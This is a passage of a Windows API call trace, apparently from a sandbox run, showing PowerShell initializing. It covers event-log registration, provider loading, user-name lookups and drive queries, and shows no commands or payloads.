	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.953] CoTaskMemFree (pv=0xf9420) 
	[0320.953] CoTaskMemFree (pv=0x0) 
	[0320.953] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0320.953] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0xf9420, lpcchName=0x28d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.954] CoTaskMemFree (pv=0xf9420) 
	[0320.954] CoTaskMemFree (pv=0x0) 
	[0320.954] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x378) returned 0x0
	[0320.954] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.954] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x39c) returned 0x0
	[0320.954] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.954] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3a0) returned 0x0
	[0320.954] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.954] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3a4) returned 0x0
	[0320.954] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.955] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3a8) returned 0x0
	[0320.955] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.955] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3ac) returned 0x0
	[0320.955] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.955] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3b0) returned 0x0
	[0320.955] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.955] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3b4) returned 0x0
	[0320.972] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x0) returned 0x2
	[0320.973] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x394) returned 0x0
	[0320.973] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d0b8 | out: phkResult=0x28d0b8*=0x3b0) returned 0x0
	[0320.973] RegCloseKey (hKey=0x3b0) returned 0x0
	[0320.973] RegCloseKey (hKey=0x398) returned 0x0
	[0320.973] RegCloseKey (hKey=0x394) returned 0x0
	[0320.978] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b940008
	[0321.418] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c89b90*="WSMan", lpRawData=0x2c89900) returned 1
	[0321.420] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.421] CoTaskMemFree (pv=0xed0a0) 
	[0321.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.423] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0321.423] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0321.423] CoTaskMemFree (pv=0x1b81bfd0) 
	[0321.423] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0321.423] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0321.423] CoTaskMemFree (pv=0xf9420) 
	[0321.423] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c8f570*="Alias", lpRawData=0x2c8f300) returned 1
	[0321.429] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.429] CoTaskMemFree (pv=0xed0a0) 
	[0321.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.430] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0321.431] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0321.431] CoTaskMemFree (pv=0x1b81bfd0) 
	[0321.431] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0321.431] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0321.431] CoTaskMemFree (pv=0xf9420) 
	[0321.431] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c94b68*="Environment", lpRawData=0x2c948f8) returned 1
	[0321.437] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.438] CoTaskMemFree (pv=0xed0a0) 
	[0321.438] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.438] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0321.438] CoTaskMemFree (pv=0xed0a0) 
	[0321.438] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.439] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0321.439] CoTaskMemFree (pv=0xed0a0) 
	[0321.439] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x28cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0321.439] SetErrorMode (uMode=0x1) returned 0x1
	[0321.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x28d100 | out: lpFileInformation=0x28d100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.439] SetErrorMode (uMode=0x1) returned 0x1
	[0321.441] GetLogicalDrives () returned 0x4
	[0321.441] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.442] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.442] SetErrorMode (uMode=0x1) returned 0x1
	[0321.443] CoTaskMemAlloc (cb=0x68) returned 0x1b7e4d60
	[0321.443] CoTaskMemAlloc (cb=0x68) returned 0x1b7e4970
	[0321.443] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7e4d60, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x28d0d0, lpMaximumComponentLength=0x28d0cc, lpFileSystemFlags=0x28d0c8, lpFileSystemNameBuffer=0x1b7e4970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28d0d0*=0x9c354b42, lpMaximumComponentLength=0x28d0cc*=0xff, lpFileSystemFlags=0x28d0c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0321.444] CoTaskMemFree (pv=0x1b7e4d60) 
	[0321.444] CoTaskMemFree (pv=0x1b7e4970) 
	[0321.444] SetErrorMode (uMode=0x1) returned 0x1
	[0321.444] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.444] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28ce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.444] SetErrorMode (uMode=0x1) returned 0x1
	[0321.445] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d070 | out: lpFileInformation=0x28d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.445] SetErrorMode (uMode=0x1) returned 0x1
	[0321.445] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28ce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.445] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.445] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.445] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.445] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0321.446] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.446] SetErrorMode (uMode=0x1) returned 0x1
	[0321.446] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cea0 | out: lpFileInformation=0x28cea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.446] SetErrorMode (uMode=0x1) returned 0x1
	[0321.446] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.446] SetErrorMode (uMode=0x1) returned 0x1
	[0321.446] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cea0 | out: lpFileInformation=0x28cea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.446] SetErrorMode (uMode=0x1) returned 0x1
	[0321.447] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0321.447] SetErrorMode (uMode=0x1) returned 0x1
	[0321.447] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cf40 | out: lpFileInformation=0x28cf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0321.447] SetErrorMode (uMode=0x1) returned 0x1
	[0321.447] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0321.447] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0321.448] CoTaskMemFree (pv=0x1b81bfd0) 
	[0321.448] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0321.448] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0321.448] CoTaskMemFree (pv=0xf9420) 
	[0321.448] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c9bc58*="FileSystem", lpRawData=0x2c9b9e8) returned 1
	[0321.459] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.459] CoTaskMemFree (pv=0xed0a0) 
	[0321.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.460] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0321.460] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0321.461] CoTaskMemFree (pv=0x1b81bfd0) 
	[0321.461] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0321.461] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0321.461] CoTaskMemFree (pv=0xf9420) 
	[0321.461] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ca1498*="Function", lpRawData=0x2ca1228) returned 1
	[0321.464] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0321.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.465] CoTaskMemFree (pv=0xed0a0) 
	[0321.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0321.967] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0321.967] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0322.410] CoTaskMemFree (pv=0x1b81bfd0) 
	[0322.410] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0322.410] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0322.410] CoTaskMemFree (pv=0xf9420) 
	[0322.411] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd3870*="Registry", lpRawData=0x2cd3600) returned 1
	[0322.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.739] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0322.739] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0322.740] CoTaskMemFree (pv=0x1b81bfd0) 
	[0322.740] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0322.740] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
	[0322.740] CoTaskMemFree (pv=0xf9420) 
	[0322.741] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cd8c88*="Variable", lpRawData=0x2cd8a18) returned 1
	[0322.747] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0322.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.748] CoTaskMemFree (pv=0xed0a0) 
	[0322.750] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0322.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.750] CoTaskMemFree (pv=0xed0a0) 
	[0322.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0322.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0323.200] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0323.200] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d348) returned 0x1
	[0323.201] CoTaskMemFree (pv=0x1b81bfd0) 
	[0323.201] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0323.201] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d388) returned 1
